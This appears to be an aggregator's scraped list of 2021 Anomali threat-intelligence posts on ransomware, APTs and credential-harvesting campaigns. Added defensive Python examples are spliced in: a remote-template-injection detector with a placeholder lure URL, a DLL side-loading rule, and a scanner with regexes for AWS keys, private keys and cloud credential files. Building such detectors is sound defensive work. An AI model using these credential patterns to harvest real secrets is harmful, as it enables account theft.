MITRE ATT&CK: [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Credential Dumping - T1003 | [MITRE ATT&CK] Data Encrypted for Impact - T1486 Tags: BazaCall, Bazaar, Ransomware Crimea “Manifesto” Deploys VBA RAT Using Double Attack Vectors (published: July 29, 2021) Hossein Jazi has identified a suspicious document named "Манифест" ("Manifesto"). It downloads and executes two templates: one is macro-enabled and the other is an Internet Explorer exploit. While both techniques rely on template injection to drop a full-featured Remote Access Trojan, the IE exploit is an unusual discovery. Analyst Comment: Files that request content be enabled to properly view the document are often signs of a phishing attack. If such a file is sent to you via a known and trusted sender, that individual should be contacted to verify the authenticity of the attachment prior to opening. Any such file attachment sent by an unknown sender should be viewed with the utmost scrutiny; the attachment should not be opened and should be reported to the appropriate personnel. MITRE ATT&CK: [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Template Injection - T1221 | [MITRE ATT&CK] Scheduled Task - T1053 | [MITRE ATT&CK] Modify Registry - T1112 Tags: VBA, Russia, RAT, CVE- Ransomware Data Breach Spam Malware Threat Guideline
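The "Манифест" lure works because an Office document can point at a template that lives on a remote server (Template Injection, T1221): the document body stays clean and Word fetches the template, macro-enabled or otherwise, when the file is opened. The script below is an added example, not from the Anomali digest or from the Malwarebytes analysis it summarizes. It inspects the relationship parts of an OOXML file for external targets of the relationship types that are fetched automatically on open, and builds a minimal .docx in memory (constructed sample; the template URL is a placeholder) so it runs offline. It applies to any OOXML container, not only the document in the story.

```python
"""Detect remote template injection (ATT&CK T1221) in an OOXML document.

Added example, not part of the Anomali article. A .docx is a zip; a template
injection lure keeps word/document.xml benign and puts an External
attachedTemplate relationship in word/_rels/settings.xml.rels. The .docx
below is constructed in memory and its URL is a placeholder.
"""
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
# Relationship types whose external targets Office fetches on open.
SUSPICIOUS_REL_TYPES = (
    "/relationships/attachedTemplate",   # remote .dotm in settings.xml.rels
    "/relationships/oleObject",          # external OLE link
)


def external_template_refs(docx_bytes):
    """Return [(rels_part, relationship_kind, target)] for auto-fetched external references."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(REL_NS + "Relationship"):
                if rel.get("TargetMode") != "External":
                    continue
                rel_type = rel.get("Type", "")
                for suffix in SUSPICIOUS_REL_TYPES:
                    if rel_type.endswith(suffix):
                        hits.append((name, suffix.rsplit("/", 1)[-1], rel.get("Target")))
    return hits


def build_sample_docx(template_url=None):
    """Construct a minimal .docx; with template_url set, it carries an external attachedTemplate."""
    rels_open = ('<?xml version="1.0" encoding="UTF-8"?>'
                 '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">')
    template_rel = ""
    if template_url is not None:
        template_rel = ('<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/'
                        'officeDocument/2006/relationships/attachedTemplate" '
                        f'Target="{template_url}" TargetMode="External"/>')
    settings_rels = rels_open + template_rel + "</Relationships>"
    document_rels = (rels_open +
                     '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/'
                     'officeDocument/2006/relationships/settings" Target="settings.xml"/>'
                     "</Relationships>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr("word/settings.xml", "<settings/>")
        zf.writestr("word/_rels/document.xml.rels", document_rels)
        zf.writestr("word/_rels/settings.xml.rels", settings_rels)
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_docx("http://template.example/lure.dotm")
    for part, kind, target in external_template_refs(sample):
        print(f"{part}: external {kind} -> {target}")
```

At a mail gateway the same function runs over every .docx, .dotx and .docm attachment; a hit on `attachedTemplate` with an http(s) target is a strong signal, because legitimate templates are almost always local or UNC paths inside the organization.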
Anomali.webp 2021-07-20 15:00:00 Anomali Cyber Watch: China Blamed for Microsoft Exchange Attacks, Israeli Cyber Surveillance Companies Help Oppressive Governments, and More (direct link) The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: China, APT, Espionage, Ransomware, Targeted Campaigns, DLL Side-Loading, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence UK and Allies Accuse China of a Pervasive Pattern of Hacking, Breaching Microsoft Exchange Servers (published: July 19, 2021) On July 19th, 2021, the US, the UK, and other global allies jointly accused China of a pattern of aggressive malicious cyber activity. First, they confirmed that Chinese state-backed actors (previously identified under the group name Hafnium) were responsible for gaining access to computer networks around the world via Microsoft Exchange servers. The attacks took place in early 2021, affecting over a quarter of a million servers worldwide. Additionally, APT31 (Judgement Panda) and APT40 (Kryptonite Panda) were attributed to the Chinese Ministry of State Security (MSS), the US Department of Justice (DoJ) indicted four APT40 members, and the Cybersecurity and Infrastructure Security Agency (CISA) shared indicators of compromise from historic APT40 activity. Analyst Comment: Network defense in depth and adherence to information security best practices can help organizations reduce the risk. Pay special attention to patch and vulnerability management, protecting credentials, and continuing network hygiene and monitoring. 
When possible, enforce the principle of least privilege, and use segmentation and strict access control measures for critical data. Organisations can use Anomali Match to perform real-time forensic analysis for tracking such attacks. MITRE ATT&CK: [MITRE ATT&CK] Drive-by Compromise - T1189 | [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] External Remote Services - T1133 | [MITRE ATT&CK] Server Software Component - T1505 | [MITRE ATT&CK] Exploitation of Remote Services - T1210 Tags: Hafnium, Judgement Panda, APT31, TEMP.Jumper, APT40, Kryptonite Panda, Zirconium, Leviathan, TEMP.Periscope, Microsoft Exchange, CVE-2021-26857, CVE-2021-26855, CVE-2021-27065, CVE-2021-26858, Government, EU, UK, North America, China NSO’s Spyware Sold to Authoritarian Regimes Used to Target Activists, Politicians and Journalists (published: July 18, 2021) Israeli surveillance company NSO Group supposedly sells spyware only to vetted government bodies to fight crime and terrorism. New research found NSO’s tools being used against non-criminal targets: pro-democracy activists, journalists investigating corruption, political opponents and government critics, diplomats, etc. In some cases, the timeline of this surveillance coincided with journalists' arrests and even murders. The main penetration tool used by NSO is the malware Pegasus, which targets both iPho Ransomware Malware Tool Vulnerability Threat Studies Guideline Industrial APT 41 APT 40 APT 28 APT 31
Anomali.webp 2021-07-13 15:00:00 Cyber Threat Intelligence Combined with MITRE ATT&CK Provides Strategic Advantage over Cyber Threats (direct link) Many security executives have a fundamental familiarity with the MITRE ATT&CK framework, although most perceive it within a narrow set of use cases specific to deeply technical cyber threat intelligence (CTI) analysts. The truth, though, is that when integrated into overall security operations, it can produce profound security and risk benefits. What is MITRE ATT&CK? MITRE ATT&CK serves as a global knowledge base for understanding threats across their entire lifecycle. The framework’s differentiator is its focus on the tactics, techniques, and procedures (TTPs) that threats use to operate in the real world, rather than just on typical indicators like IP addresses, file hashes, registry keys, and so on. MITRE ATT&CK offers a rigorous and holistic method for understanding the types of adversaries operating in the wild and their most observed behaviors, and for defining and classifying those behaviors with a common taxonomy. This is an advantage that brings a much-needed level of organization to the chaotic threat landscape organizations face. MITRE ATT&CK has practical applications across a range of security functions when security tooling and processes are mapped to it. By characterizing threats and their TTPs in a standardized way and visualizing them through the MITRE ATT&CK matrix, the framework makes it easier for security leaders and their direct reports to determine and communicate the highest-priority threats they are facing and to take more sweeping, strategic actions to mitigate them. In the Weeds? Yes and No At first glance, MITRE ATT&CK can be intimidating. It may even seem too technically in the weeds for executives who are grappling with leadership-level security concerns. However, the truth is that MITRE ATT&CK holds tremendous strategic potential. It can also help accelerate the cybersecurity maturation process. 
The framework does undoubtedly help security practitioners with their day-to-day technical analysis, making them better at their jobs. However, when used to its full potential, MITRE ATT&CK can help security executives gain better value out of existing technologies, with threat intelligence platforms (TIPs), SIEMs, and other security analytics tools being among these. More importantly, it helps establish strategic visibility into gaps in controls, making it easier to prioritize security investments in people, processes, services, and solutions. CISOs and other security executives could almost think of it as a tool that automates the creation of a roadmap, showing them precisely where the onramps to threats are located in their networks and what vehicles adversaries are using to enter. Let’s take a closer look at how MITRE ATT&CK works and why those in charge of security shouldn’t wait to adopt it into their strategic arsenals. Programmatic Benefits Having established that MITRE ATT&CK provides value to security leaders, let’s consider a few of the genuine benefits it delivers, as it isn’t just in the day-to-day minutiae of security operations where MITRE ATT&CK shines. Overlay. When an organization overlays its existing security posture and controls on top of MITRE ATT&CK-contextualized CTI, it becomes much easier to identify the riskiest control gaps present in the security ecosystem. Productivity. When looking at workflows and the teams available to respond to the MITRE ATT&CK-delineated TTPs most likely to target the organization, leaders can more easily identify at-risk talent and process gaps and then take steps to better address both. Prioritization. As security leaders go through their regularly scheduled validation of security coverage, they should leverage their CTI to identify the most common TTPs relevant to their environments. MITRE ATT&CK can crisply articulate this. 
With an understanding of where their biggest risks reside, executiv Tool Threat Guideline
Anomali.webp 2021-07-06 15:05:00 Anomali Cyber Watch: Thousands attacked as REvil ransomware hijacks Kaseya VSA, Leaked Babuk Locker Ransomware Builder Used In New Attacks and More (direct link) The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Babuk, IndigoZebra, Ransomware, REvil, Skimmer, Zero-day and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Shutdown Kaseya VSA Servers Now Amidst Cascading REvil Attack Against MSPs, Clients (published: July 4, 2021) A severe ransomware attack reportedly took place against the popular remote monitoring and management (RMM) tool Kaseya VSA. On July 2, 2021, Kaseya urged users to shut down their VSA servers to prevent them from being compromised. The company estimated that fewer than 40 of its customers worldwide were affected, but as some of them were managed service providers (MSPs), over 1,000 businesses were infected. The majority of known victims are in the US, with some in Europe (Sweden) and New Zealand. The attackers exploited a zero-day vulnerability in Kaseya’s systems that the company was in the process of fixing. It was one of the administrative-interface vulnerabilities in system administration tools previously identified by Wietse Boonstra, a DIVD researcher. The REvil payload was delivered via Kaseya software using a custom dropper that dropped two files. The dropper opens an old but legitimate copy of Windows Defender (MsMpEng.exe), which then side-loads and executes the custom malicious loader's export. 
The attack coincided with the start of the US Independence Day weekend and contains several politically charged strings, such as a “BlackLivesMatter” Windows registry key and “DTrump4ever” as a password. Analyst Comment: Kaseya VSA clients should follow the company’s recommendations: it advised shutting Kaseya VSA servers down and is making new security updates available. Every organization should have a ransomware disaster recovery plan even if it is serviced by a managed service provider (MSP). MITRE ATT&CK: [MITRE ATT&CK] Data Encrypted for Impact - T1486 | [MITRE ATT&CK] Supply Chain Compromise - T1195 | [MITRE ATT&CK] DLL Side-Loading - T1073 Tags: REvil, Sodinokibi, GandCrab, Leafroller, Kaseya VSA, ransomware, Ransomware-as-a-Service, zero-day, CVE-2021-30116, supply-chain, North America, USA, Sweden, New Zealand, MSP, RMM, schools IndigoZebra APT Continues To Attack Central Asia With Evolving Tools (published: July 1, 2021) Researchers from Check Point have identified the Afghan government as the latest victim of a cyber espionage campaign by the suspected Chinese group ‘IndigoZebra’. The attack began in April, when Afghan National Security Council (NSC) officials began to receive lure emails claiming to be from the President’s secretariat. These emails included a decoy file that would install the ‘BoxCaon’ backdoor on the system, which then reaches out to the Dropbox API, used as a C&C server. The attacker would then be able to fingerprint the machine and begin accessing files. I Ransomware Spam Malware Tool Vulnerability Threat Guideline APT 19 APT 10
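The Kaseya dropper pattern above (a signed, legitimate MsMpEng.exe copied to a directory the attacker controls, which then loads an unsigned DLL sitting next to it) is detectable from image-load telemetry without knowing the payload in advance. The rule below is an added example, not code from the Anomali digest, Kaseya or any incident responder: it runs over constructed Sysmon-style Event ID 7 (ImageLoad) records and flags an unsigned DLL loaded from the same directory as a process that is executing outside the normal Windows and Program Files locations. The field names follow Sysmon, but the paths and the DLL name `loader.dll` are placeholders, not indicators from the incident; `MsMpEng.exe` appears on the watchlist only because the story names it.

```python
"""Detect DLL side-loading by a relocated signed binary (ATT&CK T1073 / T1574.002).

Added example, not from the Anomali article. Input lines are constructed
Sysmon-like ImageLoad (Event ID 7) records in 'Key=Value; Key=Value' form.
In Sysmon's Event 7, the Signed/Signature fields describe the DLL that was
loaded (ImageLoaded), not the loading process (Image).
"""
import ntpath

# Where a vendor-signed binary is expected to run from. Anything else (temp
# directories, user profiles, web roots) is a candidate staging location.
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
# Hosts known to be abused for side-loading; MsMpEng.exe is the one this story cites.
WATCHLIST = {"msmpeng.exe"}


def parse_event(line):
    """Parse 'Key=Value; Key=Value' into a dict (constructed log format)."""
    fields = {}
    for part in line.split(";"):
        if "=" in part:
            key, val = part.split("=", 1)
            fields[key.strip()] = val.strip()
    return fields


def is_sideload(ev):
    """True for an unsigned DLL loaded from the process's own, untrusted directory."""
    image, loaded = ev.get("Image", ""), ev.get("ImageLoaded", "")
    if image.lower().startswith(TRUSTED_DIRS):
        return False                      # binary runs from where it belongs
    if ev.get("Signed", "false").lower() == "true":
        return False                      # the loaded DLL itself is signed
    return ntpath.dirname(image).lower() == ntpath.dirname(loaded).lower()


def find_sideloads(lines):
    """Return (process, dll, severity) for every Event 7 record matching the pattern."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "7" or not is_sideload(ev):
            continue
        severity = "high" if ntpath.basename(ev["Image"]).lower() in WATCHLIST else "medium"
        hits.append((ev["Image"], ev["ImageLoaded"], severity))
    return hits


# Constructed records. Paths, the staging directory and loader.dll are placeholders.
SAMPLE_EVENTS = [
    # Defender engine in its install path loading a signed DLL: benign.
    r"EventID=7; Image=C:\Program Files\Windows Defender\MsMpEng.exe; ImageLoaded=C:\Program Files\Windows Defender\engine.dll; Signed=true; Signature=Microsoft Windows",
    # Relocated copy loading a signed system DLL: not a side-load.
    r"EventID=7; Image=C:\Users\Public\stage\MsMpEng.exe; ImageLoaded=C:\Windows\System32\kernel32.dll; Signed=true; Signature=Microsoft Windows",
    # Relocated copy loading an unsigned DLL from its own directory: side-load.
    r"EventID=7; Image=C:\Users\Public\stage\MsMpEng.exe; ImageLoaded=C:\Users\Public\stage\loader.dll; Signed=false; Signature=",
    # Process creation for the same binary: a different rule's business.
    r"EventID=1; Image=C:\Users\Public\stage\MsMpEng.exe; CommandLine=MsMpEng.exe",
]

if __name__ == "__main__":
    for proc, dll, sev in find_sideloads(SAMPLE_EVENTS):
        print(f"[{sev}] {proc} side-loaded {dll}")
```

The same logic ports directly to a SIEM query: join on the process image directory, filter `Signed=false`, and exclude the trusted install roots. Expect tuning for software that legitimately runs from user-writable paths with unsigned helper DLLs.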
Anomali.webp 2021-06-23 15:45:00 Anomali is Investing in Intelligence Powered Cloud XDR (direct link) Our Match XDR Use Cases Stop Breaches I want to extend my gratitude to the various CISOs that I have spent time with during my first three months at Anomali, and the many more that I will be talking to soon. You recognize us as the market leader in global threat intelligence that is enriched by being the hub of threat sharing across trusted circles. You also credit our ThreatStream product for seamless integration with your SIEM, Network, EDR and other security technologies. Some of you have adopted our Match product to deliver specific and powerful use cases in extended detection and response (XDR). Coupled with big data ingestion, we use machine learning and AI to help you stop significant breaches. Today, we are excited to announce that Anomali is investing in intelligence-powered cloud XDR using our Match product use cases as the starting foundation. We are ready to have conversations with those of you that want to explore our current Match use cases as well as conversations about cloud XDR, which we expect to deliver later in our fiscal year. If you currently use Match, we expect to provide you with a choice of bridging to cloud XDR. Our mission is to help you improve your security posture and build cyber resilience by stopping breaches, which all starts and ends with intelligence. The best outcome is when we have your feedback and we work together; please reach out to us. Threat Guideline
Anomali.webp 2021-06-08 15:00:00 Anomali Cyber Watch: TeamTNT Actively Enumerating Cloud Environments to Infiltrate Organizations, Necro Python Bot Adds New Tricks, US Seizes Domains Used by APT29 and More (direct link) The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, APT29, FluBot, Necro Python, RoyalRoad, SharpPanda, TeaBot and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence TeamTNT Actively Enumerating Cloud Environments to Infiltrate Organizations (published: June 4, 2021) Researchers at Palo Alto have identified a malware repository belonging to TeamTNT, the prominent cloud-focused threat group. The repository shows the expansion of TeamTNT's abilities and includes scripts for scraping SSH keys and AWS IAM credentials and for searching for config files that contain credentials. In addition to AWS credentials, TeamTNT is now also searching for Google Cloud credentials, the first instance of the group expanding to GCP. Analyst Comment: Any internal-only cloud assets, and SSH or privileged access to customer-facing cloud infrastructure, should only be reachable via the company VPN. This ensures attackers don’t get admin access from over the internet even if keys or credentials are compromised. Customers should monitor public leaks for compromised credentials and immediately reset the passwords of the affected accounts. 
MITRE ATT&CK: [MITRE ATT&CK] Permission Groups Discovery - T1069 Tags: AWS, Cloud, Credential Harvesting, cryptojacking, Google Cloud, IAM, scraping, TeamTnT, Black-T, Peirates Necro Python Bot Adds New Tricks (published: June 3, 2021) Researchers at Talos have identified updated functionality in the Necro Python bot. The core functionality is the same, with a focus on Monero mining, but exploits for the latest vulnerabilities have been added. The main payloads are XMRig, traffic sniffing and DDoS attacks. Targeting small and home office routers, the bot uses Python to support multiple platforms. Analyst Comment: Users should ensure they always apply the latest patches, as the bot looks to exploit unpatched vulnerabilities. Users also need to change the default passwords on home routers so that malware on their personal devices cannot spread to corporate devices through a router takeover. MITRE ATT&CK: [MITRE ATT&CK] Scripting - T1064 | [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Process Injection - T1055 | [MITRE ATT&CK] Input Capture - T1056 | [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Remote Access Tools - T1219 Tags: Bot, botnet, Exploit, Monero, Necro Python, Python, Vulnerabilities, XMRig New SkinnyBoy Ma Ransomware Malware Vulnerability Threat Patching Guideline APT 29 APT 28
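TeamTNT's scripts, as the entry describes them, look for the same things a defender should be sweeping for first: AWS access keys, SSH private keys and cloud credential files left on build agents, jump hosts and container images. The scanner below is an added example, not code from the Anomali digest or from Palo Alto's report, and it is written from the defender's side: it walks a directory tree and reports files that hold credential material by content pattern or by well-known path. The sample tree is constructed in a temporary directory with dummy values (the `AKIAIOSFODNN7EXAMPLE` key is the placeholder value AWS uses in its own documentation), so it runs offline.

```python
"""Sweep a directory tree for credential material an intruder would harvest.

Added example, not from the Anomali article. The sample files are constructed
with placeholder values; paths in the results use '/' regardless of OS.
"""
import os
import re
import tempfile

PATTERNS = {
    "aws_access_key_id": re.compile(r"(?<![A-Z0-9])(?:AKIA|ASIA)[0-9A-Z]{16}(?![A-Z0-9])"),
    "private_key_block": re.compile(r"-----BEGIN (?:RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----"),
    "gcp_service_account": re.compile(r'"type"\s*:\s*"service_account"'),
}
# Well-known credential stores: reported by path even when no pattern fires.
SENSITIVE_SUFFIXES = (".aws/credentials", ".docker/config.json", ".kube/config")
MAX_BYTES = 1 << 20  # skip big binaries; secrets live in small text files


def scan_tree(root):
    """Return sorted (relative_path, finding) pairs for credential material under root."""
    findings = set()
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if rel.endswith(SENSITIVE_SUFFIXES):
                findings.add((rel, "known_credential_file"))
            try:
                if os.path.getsize(path) > MAX_BYTES:
                    continue
                with open(path, "r", errors="ignore") as fh:
                    text = fh.read()
            except OSError:
                continue
            for label, rx in PATTERNS.items():
                if rx.search(text):
                    findings.add((rel, label))
    return sorted(findings)


def build_sample_tree(base):
    """Populate base with constructed files: three leaks and one benign file."""
    samples = {
        ".aws/credentials":
            "[default]\naws_access_key_id = AKIAIOSFODNN7EXAMPLE\n"
            "aws_secret_access_key = not-a-real-secret\n",
        ".ssh/id_ed25519":
            "-----BEGIN OPENSSH PRIVATE KEY-----\nZHVtbXk=\n-----END OPENSSH PRIVATE KEY-----\n",
        "app/gcp-sa.json":
            '{"type": "service_account", "project_id": "demo", "private_key": "dummy"}\n',
        "app/README.md": "Nothing to see here.\n",
    }
    for rel, content in samples.items():
        full = os.path.join(base, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write(content)


def demo():
    """Build the sample tree in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return scan_tree(tmp)


if __name__ == "__main__":
    for rel, finding in demo():
        print(f"{finding:24} {rel}")
```

Anything this reports on a shared host is a finding in its own right: long-lived keys on disk should be replaced by instance roles, workload identity or short-lived STS tokens, which is what removes the value of the files TeamTNT is scraping.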
Anomali.webp 2021-05-26 17:20:00 Threat Intelligence Platforms Help Organizations Overcome Key Security Hurdles (direct link) Dealing with Big Data, Providing Context, Integration, and Fast Understanding of New Threats are Among the Benefits Threat Intelligence Platforms (TIPs) Provide When industry analysts survey security professionals these days, the common consensus is that it’s now harder to manage security operations than ever before. For example, a recent Enterprise Strategy Group (ESG) research study showed that some 63 percent of security pros say that the job is tougher today than it was just two years ago. While there's no doubt that the variety and volume of threats keep growing by the year, the question is whether it’s the complexity of the security problems that has risen precipitously, or whether something else is going on. I'd argue that it's mostly the latter: it’s not so much that the complexity has grown tremendously over this time as that the awareness of already latent complexity has become more apparent. As the breadth of technologies and data available to modern cybersecurity organizations continues to proliferate, security strategists are finally getting enough visibility into their environments to start discovering gaps that have existed all along. But knowing where the deficiencies exist doesn’t always equate to being able to address them. These same security folks are also struggling to wrap their arms around what is possible to achieve by using the array of tools in their arsenals and the vast quantities of information available. Years ago in the security world, the common mantra was that security organizations “don't know what they don't know”, and this was due to deficiencies in monitoring and threat intelligence capabilities. Nowadays the opposite is true. 
They're flooded with data and are starting to get a better sense of what they don't fully know or understand about adversarial activities in their environments. But this dawning self-awareness can be quite nerve-wracking as they ask themselves, “Now that I know, what should I do?” It can be daunting to make the jump from understanding to taking action; this is the process that many organizations struggle with when we talk about “operationalizing” threat intelligence. For security operations, it’s not enough to just know about an adversary via various threat feeds and other sources. To take action, threat intelligence needs to be deployed in real time so that security tools and personnel can actually leverage it to run investigations, detect the presence of threats in their networks, respond faster, and continuously improve their security architectures. But there are many significant hurdles in running security operations that stand in the way of achieving those goals. This is where a robust threat intelligence platform (TIP) can add significant value to the security ecosystem. TIPs help security operations teams tackle some of the greatest hurdles. Big Data Conundrum with Threat Intelligence Platforms The first challenge is that the sheer volume of threat intelligence made available to security teams has become a big data problem, one that can't be solved by just filtering out the feeds that are in use, which would defeat the purpose of acquiring varied and relevant feeds in the first place. Organizations don't want to ingest millions or billions of evolving threat indicators into their security information and event manager (SIEM), which would be cost-prohibitive and would also lead to the creation of unmanageable levels of false positives. This is where Anomali comes in: with a TIP doing the work on the front end, interesting, pre-curated threat “matches” can be integrated directly into your SIEM. These matches prese Tool Threat Guideline SolarWinds
Anomali.webp 2021-05-25 15:00:00 Anomali Cyber Watch: Bizarro Trojan Expands to Europe, Fake Call Centers Help Spread BazarLoader Malware, Toshiba Business Reportedly Hit by DarkSide Ransomware and More (direct link) The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: BazarCall, DarkSide, Data breach, Malware, Phishing, Ransomware and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Air India passenger data breach reveals SITA hack worse than first thought (published: May 23, 2021) Adding to the growing body of knowledge related to the March 2021 breach of SITA, a multinational information technology company providing IT and telecommunication services to the air transport industry, Air India announced over the weekend that the personal information of 4.5 million customers was compromised. According to the airline, the stolen information included passengers’ names, credit card details, dates of birth, contact information, passport information, ticket information, and Star Alliance and Air India frequent flyer data. The compromise included data for passengers who registered with Indian Airlines between 26 August 2011 and 3 February 2021, nearly a decade. Air India joins the growing list of SITA clients impacted by the breach, including Malaysia Airlines, Finnair, Singapore Airlines, Jeju Air, Cathay Pacific, Air New Zealand, and Lufthansa. Analyst Comment: Unfortunately, breaches like this are commonplace. 
While customers have no control over their information being included in such a breach, they can and should take appropriate actions once notified they may be impacted. Those actions can include changing passwords and credit cards associated with the breached accounts, engaging with credit reporting agencies for enhanced credit monitoring or for freezing credit inquiries made without permission, and reaching out to the breached companies to learn what protections they may be offering their clients. Tags: Data Breach, Airline, PII BazarCall: Call Centers Help Spread BazarLoader Malware (published: May 19, 2021) Researchers from Palo Alto’s Unit 42 released a breakdown of a new infection method for the BazarLoader malware. Once installed, BazarLoader provides backdoor access to an infected Windows host, which criminals can use to scan the environment, send follow-up malware, and exploit other vulnerable hosts on the network. In early February 2021, researchers began to report a “call center” method of distributing BazarLoader. Actors would send phishing emails with trial-subscription themes encouraging victims to phone a number to unsubscribe. If a victim called, the actor would answer and walk the victim through a process that infects the computer with BazarLoader. Analysts dubbed this infection method “BazarCall.” Analyst Comment: This exemplifies the social engineering tactics threat actors employ to trick users into installing malware on their machines. All social media users should be cautious when accepting unknown requests to connect, and particularly cautious when receiving communication from unknown users. Even if cal Ransomware Data Breach Malware Hack Tool Vulnerability Threat Guideline
Anomali.webp 2021-05-19 16:45:00 Forrester Tech Tide for Threat Intelligence Recognizes Anomali (direct link) Threat Intelligence Increasingly Viewed as Adding High Business Value and Increased Resiliency, According to Leading Cybersecurity Report Adversaries will eventually compromise every organization. When the world woke to the news that Colonial Pipeline was the latest major enterprise to join the ransomware victims’ club, we once again had to accept this notion. With this fact of digital life now almost universally recognized, CISOs are starting to look for technologies and services that can help them build a higher level of resiliency across their infrastructures. When trying to decide how and where to invest their scarce security budgets, leaders can find themselves uncertain as they sort through the overwhelming amount of marketing content available to them. To provide our customers and prospects with a better understanding of our role in helping them achieve their security and risk goals, we frequently engage with analyst organizations that provide objective, third-party information about what we offer and how we add value. Recently, Anomali was recognized in the Forrester Tech Tide™: Threat Intelligence, Q2 2021. We believe readers will find the report particularly useful in understanding why threat intelligence is now a key driver of resiliency and why it has moved from the “nice to have” to the “must-have” column. According to the report: Threat intelligence is increasingly critical to firms’ ability to manage cyber risk and build resilient security programs. To accelerate their threat intelligence performance, firms are evaluating and adopting multiple services and technologies. This Forrester Tech Tide™ report presents an analysis of the maturity and business value of the 15 service and technology categories that enable an effective threat intelligence-driven security program. 
Security and risk pros should read this report to shape their firm’s investment approach to these technologies. Forrester analysts positioned Anomali in the “Intelligence Management Solutions” section, which they ranked as “high” in business value and designated with an “invest” rating. According to the report: Security professionals can become overwhelmed with the amount of data and alerts they receive. Intelligence management solutions provide processes for intelligence professionals to manage stakeholder requirements, automate intelligence collection, maximize data analysis, and operationalize the intelligence. Although the full range of capabilities and strategic security advantages we offer extend beyond this evaluation, this positioning further validates how the Anomali product suite of intelligence-driven cybersecurity solutions addresses the key benefits outlined. No cybersecurity vendor is an island, which is why a layered approach to security will always be needed to ensure protection against the rising level of sophisticated and stealthy attacks organizations face. In addition to validating more deeply several of the security areas that Anomali helps its customers to address, the report also provides insights into the wide range of threat intelligence technologies on the market today, which includes a look at several of our key partners in the Anomali ecosystem — the deepest and widest available on the market today.   To read more about how the essential solutions that Anomali provides can help your organization to minimize the risk of falling victim to damaging cyberattacks, download the full Forrester Tech Tide™: Threat Intelligence, Q2 2021. Ransomware Threat Guideline
Anomali.webp 2021-05-18 19:05:00 Anomali Cyber Watch: Microsoft Azure Vulnerability Discovered, MSBuild Used to Deliver Malware, Escalation of Avaddon Ransomware and More (lien direct) The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Android, Malware, Ransomware, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Cross-Browser Tracking Vulnerability Tracks You Via Installed Apps (published: May 14, 2021) A new cross-browser fingerprinting technique, dubbed scheme flooding, has been disclosed. Custom URL schemes let a web page ask the browser to hand a link to an installed application; by probing a long list of schemes in turn and observing whether the browser reacts, a page can determine which applications are installed and combine the results into a fingerprint that stays the same across every browser on the same device. Google Chrome has protections against this attack, but they can be bypassed via the built-in PDF viewer, which resets the flag used for flood protection. Until browser vendors close the gap, the only known protection against scheme flooding is to use browsers across multiple devices. Analyst Comment: It is critical that the latest security patches be applied as soon as possible to the web browser used by your company. Vulnerabilities are discovered relatively frequently, and it is paramount to install the security patches because the vulnerabilities are often posted to open sources where any malicious actor could attempt to mimic the techniques that are described. Tags: Scheme Flooding, Vulnerability, Chrome, Firefox, Edge Threat Actors Use MSBuild to Deliver RATs Filelessly (published: May 13, 2021) Anomali Threat Research has identified a campaign in which threat actors are using MSBuild project files to deliver malware. 
